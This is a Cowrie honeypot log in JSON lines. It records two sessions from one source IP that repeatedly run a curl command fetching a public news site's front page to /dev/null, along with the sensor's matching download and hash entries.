{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.350472Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.351553Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.353877Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.367253Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.387604Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.388712Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.391744Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.392895Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.396685Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.399278Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.426035Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.427071Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.429288Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.430291Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.464760Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.465747Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.468992Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.470081Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.495691Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.501000Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.505070Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.505947Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.508596Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.511463Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.541164Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.542242Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.549365Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.550264Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.577051Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.578027Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.595969Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.596854Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.601208Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.607265Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.608764Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.611326Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.614941Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.615768Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.618701Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.621477Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.638779Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.639952Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.640843Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.652318Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.653720Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.654505Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.679841Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.680885Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.686165Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.689530Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.691020Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.714633Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.717524Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.719139Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.720019Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.728762Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.729758Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.744842Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.758361Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.759343Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.763804Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.764684Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.778394Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.780408Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.801448Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.802624Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.806949Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.807690Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.821962Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.827368Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.832095Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.840253Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.841265Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.852064Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.852951Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.864972Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.877730Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.878709Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.887451Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.888371Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.918266Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.919685Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.923897Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.924938Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.927336Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.945707Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
